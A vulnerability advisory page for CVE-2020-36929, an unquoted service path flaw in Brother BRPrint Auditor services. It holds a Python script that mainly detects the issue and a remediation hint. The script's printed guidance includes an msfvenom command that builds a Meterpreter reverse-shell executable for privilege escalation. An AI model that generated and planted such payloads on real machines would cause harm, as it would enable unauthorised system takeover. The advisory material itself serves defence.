Security Vulnerability Report
CVE-2020-36929 CVSS 7.8 HIGH

CVE-2020-36929

Published: 2026-01-16 00:16:20
Last Modified: 2026-02-09 15:02:40

Description

Brother BRPrint Auditor 3.0.7 contains an unquoted service path vulnerability in its Windows service configurations that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted file paths in BrAuSvc and BRPA_Agent services to inject malicious executables and escalate privileges on the system.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:brother:brprint_auditor:3.0.7:*:*:*:*:*:*:* - VULNERABLE
Brother BRPrint Auditor <= 3.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
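#!/usr/bin/env python3
# CVE-2020-36929 PoC - Brother BRPrint Auditor Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability
# Attackers can place a malicious executable in an intermediate directory
#
# Reviewer notes:
# - An unquoted service path (CWE-428) is only a finding when the executable
#   portion of the command line contains whitespace. This script checks that
#   condition only. Whether a low-privileged account can actually write to a
#   parent directory depends on directory ACLs, which are NOT inspected here.
# - Nothing in this script writes files or changes service configuration; it
#   queries the service list and prints text.
import os
import sys
import subprocess


def is_unquoted_with_spaces(pathname):
    """Return True if *pathname* is an unquoted command line with a spaced image path.

    Only the executable portion (up to and including the first ``.exe``) is
    examined, so whitespace that merely separates arguments from a space-free
    executable path does not count. A command line that starts with a double
    quote is treated as correctly quoted. Empty values are never flagged.
    """
    command = pathname.strip()
    if not command or command.startswith('"'):
        return False
    exe_end = command.lower().find('.exe')
    # Without a recognisable ".exe" the whole string is treated as the image path.
    image = command if exe_end == -1 else command[:exe_end + len('.exe')]
    return any(ch.isspace() for ch in image)


def find_unquoted_paths(wmic_csv, services):
    """Extract unquoted, space-containing paths for *services* from wmic CSV text.

    Args:
        wmic_csv: Output of ``wmic service get name,pathname /format:csv``.
        services: Service names to look for (compared case-insensitively
            against the Name column, not as substrings of the whole line).

    Returns:
        A list of ``{'service': ..., 'path': ...}`` dicts, ordered by
        *services* and then by row order.
    """
    rows = []
    for raw in wmic_csv.splitlines():
        # Assumes the column order Node,Name,PathName -- TODO confirm on the
        # target Windows release. maxsplit keeps commas inside PathName intact.
        fields = raw.strip().split(',', 2)
        if len(fields) == 3:
            rows.append((fields[1].strip().lower(), fields[2].strip()))

    findings = []
    for service in services:
        for name, pathname in rows:
            if name == service.lower() and is_unquoted_with_spaces(pathname):
                findings.append({'service': service, 'path': pathname})
    return findings


def check_unquoted_paths():
    """Check for unquoted service paths in Windows services

    Queries the local service list with ``wmic`` and returns the entries for
    BrAuSvc and BRPA_Agent whose path is unquoted and contains whitespace.
    Returns an empty list when the query fails (for example when ``wmic`` is
    not available on the host).
    """
    services = ['BrAuSvc', 'BRPA_Agent']

    try:
        # Query Windows services for executable paths
        result = subprocess.check_output(
            ['wmic', 'service', 'get', 'name,pathname', '/format:csv'],
            text=True
        )
    except (OSError, subprocess.SubprocessError, UnicodeDecodeError) as e:
        # wmic is deprecated and can be missing on current Windows builds.
        print(f"Error checking services: {e}")
        return []

    return find_unquoted_paths(result, services)


def create_malicious_executable(target_path):
    """Print guidance for a reported path.

    Despite its name, this function creates nothing: it only prints the
    flagged path, the original PoC hints, and a remediation hint.
    """
    print(f"[*] Vulnerable path detected: {target_path}")
    print("[*] To exploit, create a malicious executable in the intermediate directory")
    print("[*] Example: Place 'Program.exe' in C:\\ to exploit 'C:\\Program Files\\...\\BrAuSvc.exe'")
    print("[*] Generate payload with: msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o Program.exe")
    # Defender-facing follow-up: quoting the path removes the ambiguity, and
    # tight directory ACLs remove the write primitive the issue depends on.
    print("[*] Remediation: wrap the service ImagePath in double quotes and remove non-admin write access to the parent directories")


def main():
    """Run the check and print one report entry per flagged service."""
    print("=" * 60)
    print("CVE-2020-36929 - Brother BRPrint Auditor Unquoted Service Path")
    print("=" * 60)

    vulnerable = check_unquoted_paths()

    if vulnerable:
        print(f"\n[!] Found {len(vulnerable)} vulnerable service(s):\n")
        for v in vulnerable:
            print(f"Service: {v['service']}")
            print(f"Path: {v['path']}")
            create_malicious_executable(v['path'])
            print()
    else:
        print("\n[+] No vulnerable services found or script requires admin privileges")


if __name__ == '__main__':
    main()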

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36929", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:20.320", "lastModified": "2026-02-09T15:02:39.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Brother BRPrint Auditor 3.0.7 contains an unquoted service path vulnerability in its Windows service configurations that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted file paths in BrAuSvc and BRPA_Agent services to inject malicious executables and escalate privileges on the system."}, {"lang": "es", "value": "Brother BRPrint Auditor 3.0.7 contiene una vulnerabilidad de ruta de servicio sin comillas en sus configuraciones de servicio de Windows que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar las rutas de archivo sin comillas en los servicios BrAuSvc y BRPA_Agent para inyectar ejecutables maliciosos y escalar privilegios en el sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:brother:brprint_auditor:3.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "EE28F77B-5724-4D3C-BE62-9775AA67EB19"}]}]}], "references": [{"url": "https://support.brother.com/g/s/id/common_download/en/auditor_pro3.html?c=be&lang=fr&redirect=on", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://support.brother.com/g/s/id/common_download/en/auditor_pro3.html?c=be&lang=nl&redirect=on", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50005", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/brother-brprint-auditor-multiple-unquoted-service-path", "source": "[email 
protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50005", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}